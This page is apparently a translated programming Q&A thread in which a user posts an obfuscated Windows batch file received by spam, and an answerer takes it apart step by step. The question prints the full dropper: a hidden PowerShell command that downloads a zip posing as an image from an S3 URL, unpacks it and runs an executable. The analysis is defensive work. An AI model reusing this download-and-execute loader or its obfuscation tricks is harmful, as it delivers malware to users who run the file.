这个 Windows 批处理文件会做啥
Posted
技术标签:
【中文标题】这个 Windows 批处理文件会做啥【英文标题】:What would this windows batch file do这个 Windows 批处理文件会做什么 【发布时间】:2021-05-23 23:12:19 【问题描述】:我通过垃圾邮件收到了这个程序,我不知道如果我执行它会做什么。
虽然我使用 macOS 并且知道它不会损害我的机器,但我很确定它是一种病毒,所以我想了解它。
我的猜测是它将字符的值更改为其他字符以使其不可读。
最后还有一个碎片链接。
cls
@echo off
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1, 1, %len%) do (
set /A rnd_index=!RANDOM! * %len_charpool% / 32768
for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
set ZdHy_v_fyF=a
set ZgGEYqErM___uhIAWjNJ=b
set P__JXjQl____B_zA=c
set Cnj_NdJ=d
set XivmzFFG___rc_I=e
set MGE_Jp_yjrnuydCY__zWudMUmm__A=f
set ICMPRKHvGxGlqYbvqU=g
set CnNaDuPWL__aCJbmYawO_XjI_yQ=h
set Yq_cgTV___OgMaat_VfP=i
set MJcfRtoeVwMDZ=j
set IyypGJJHieiPDkK_VvH_kWaBDADfU=k
set ST__sVoOCkBtOSu_HC=l
set DqJ_t_keWA_uetGRNsrgZCelOIQ=m
set Bpnnp_SNZcQBiJN=n
set MMvmaGXgBQ_nHZ=o
set EuxpUwQe_bUWbrg_KQ=p
set OOhhHfJZYpK_Y=q
set OQLPyY=r
set ZmWecoFDM=s
set LHJiJU=t
set SbVCD=u
set DrxJWqvnnMzGPCWhMQ=v
set XfyZEmN_UzM_tAlI=w
set IDHE_R=x
set I_Ohy_MOkJQDcatjk_pX=y
set LFgTA_NYO_YBpU=z
set AfyLB_hDkohaG=0
set Bi__eZ_rqfjZTdY_QJ_W_nuNKFMkVFM=1
set SRW_ft_avO_FuMY=2
set Y_A_q_TYWVQbqF_qQ__ncLfolUsDI=3
set IBuFjVvfpcx_f_yYNCj_cZjJczmV=4
set ZcDjFcQHZ_zMIALohJYzEBILhH=5
set LHaI_YWR_Yr_xdGET__s_ChnMfJTMC=6
set FtOBCHc__YEKXfREpPT__xqKJStxdZS=7
set YddJGsUdIcc_HF=8
set EsTG_b_ew_TaPO=9
set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"
set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
powershell.exe -windowstyle hidden -Command "& Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%');foreach($item in $zip.items())$shell.Namespace('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;Start-Process ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')"
【问题讨论】:
是否存在调用该脚本的诱惑?它可能是混合攻击的一部分。如果您在用于工作的机器上收到此邮件,请立即向您的公司管理员/安全人员报告。 【参考方案1】:对长时间的延迟表示歉意。生活多次代祷...
从第一个区块开始:
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1, 1, %len%) do (
set /A rnd_index=!RANDOM! * %len_charpool% / 32768
for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
更改名称以免触发我们拥有的任何本地警报:
>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _altPool=
@for /L %%b IN (1, 1, %len%) do @(
@set /A rnd_index=!RANDOM! * %len_charpool% / 32768
@for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _altPool=!_altPool!%%i
@echo _altPool == !_altPool!
)
>test.cmd
_altPool == 1
_altPool == 11
_altPool == 11a
>
所以它似乎在NHCf_bQIkNU_N_DE__KlMM_YNchRbY 中生成了三个随机字符。
第 12..47 行创建设置为小写 ASCII 字母数字字符的随机环境变量,但它们不会在批处理脚本中的任何地方使用。它们可能只是在混淆方面的一次糟糕尝试,或者它们可能会被其他有效负载稍后使用,可能是为了避免检测到蹩脚的熵行为。
#49 似乎是一种混淆。这里确实引用了NHCf_bQIkNU_N_DE__KlMM_YNchRbY 中的三个字符,但脚本中从未使用过ghdt2d。
set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
紧接着是:
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
而S_p_BzRKgYKgQ_KCn_LF在后面的脚本中会用到:
Find all "S_p_BzRKgYKgQ_KCn_LF"
File Untitled<1>
50 5:set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
51 22:set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
58 70:set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
66 481:...T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%D... [line truncated]
66 586:..._YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsL... [line truncated]
66 729:...V_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')" [line truncated]
Total found: 6
现在变得有趣了……
第 50..60 行似乎在设置路径/文件名变量,比脚本的其余部分更容易混淆。
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"
脚本中没有goto 的FIM 标签,因此如果存在这些文件系统对象,它们似乎是退出脚本的一种混淆方式。
更新后的测试脚本产生:
>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _entropy=
@for /L %%b IN (1, 1, %len%) do @(
@set /A rnd_index=!RANDOM! * %len_charpool% / 32768
@for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _entropy=!_entropy!%%i
@echo _entropy == !_entropy!
)
set _zipFileName= --___--_%_entropy%
REM Obfuscation: set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set _zipFileDirectory=%Programdata%\--___--_%_entropy%
set _zipFileDirectory2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
@IF EXIST %_zipFileDirectory2% GOTO FIM
REM mkdir %_zipFileDirectory2%
@IF EXIST %_zipFileDirectory% GOTO FIM
REM mkdir %_zipFileDirectory%
set _zipPathFileName=%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.zip
REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%_zipFileDirectory%\dump.dmp"
REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%_zipFileDirectory%\dump2.exe"
set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
REM powershell.exe -windowstyle hidden -Command "& Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');foreach($item in $zip.items())$shell.Namespace('%_zipFileDirectory%').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%_zipPathFileName%';Start-Sleep -s 5 ;Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')"
>test.cmd
_entropy == 4
_entropy == 45
_entropy == 45b
>set _zipFileName= --___--_45b
>REM Obfuscation: set LEG_bBk_Nyos_T=
>set _zipFileDirectory=C:\ProgramData\--___--_
>set _zipFileDirectory2=C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG
>REM mkdir C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG
>REM mkdir C:\ProgramData\--___--_
>set _zipPathFileName=C:\ProgramData\--___--_\.zip
>REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "C:\ProgramData\--___--_\dump.dmp"
>REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "C:\ProgramData\--___--_\dump2.exe"
>set dado1="http"
>set dado2="s://corni43uuy.s3"
>set dado3="-eu-west-1.am"
>set dado4="azonaws.com/image2.png"
>REM powershell.exe -windowstyle hidden -Command "& Import-Module BitsTransfer;Start-BitsTransfer ('"http""s://corni43uuy.s3""-eu-west-1.am""azonaws.com/image2.png"') 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\--___--_\.zip');foreach($item in $zip.items())$shell.Namespace('C:\ProgramData\--___--_').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\--___--_\dump.dmp') -newname ('.dmp');rename-item -path ('C:\ProgramData\--___--_\dump2.dmp') -newname ('.exe');remove-item 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\--___--_\.exe')"
>
只留下最后的 PS 调用,它可以重新格式化为这样的:
Import-Module BitsTransfer;
Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';
Start-Sleep -s 5 ;
$shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');
foreach($item in $zip.items())
$shell.Namespace('%_zipFileDirectory%').copyhere($item);
;
Start-Sleep -s 5 ;
rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');
rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');
remove-item '%_zipPathFileName%';
Start-Sleep -s 5 ;
Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')
剩下的一个原始变量S_p_BzRKgYKgQ_KCn_LF 从未由脚本设置,因此它将为空。我怀疑这个脚本没有按预期工作。但其意图似乎是要么浪费我们的时间分析它,要么可能下载并执行某些东西。如果不访问图像文件,就不可能确切知道它的用途。
https://corni43uuy.s3-eu-west-1.amazonaws.com/image2.png 处引用的图像文件不再可用:
<Error>
<Code>AllAccessDisabled</Code>
<Message>All access to this object has been disabled</Message>
<RequestId>F6D9EB7F64EA04A4</RequestId>
<HostId>WCiK2wokFJup1kWVnCRqVX43sM2NPLFeuU/WnJ1PK4uqZvo1IhH0ppgn9o4nGxX2158jqsPw+wQ=</HostId>
</Error>
Google 没有找到对该链接的任何引用。
【讨论】:
以上是关于这个 Windows 批处理文件会做啥的主要内容,如果未能解决你的问题,请参考以下文章
Linux下怎么建立任务计划,shell文件是做啥的?以啥为后缀,前两者之间有啥关系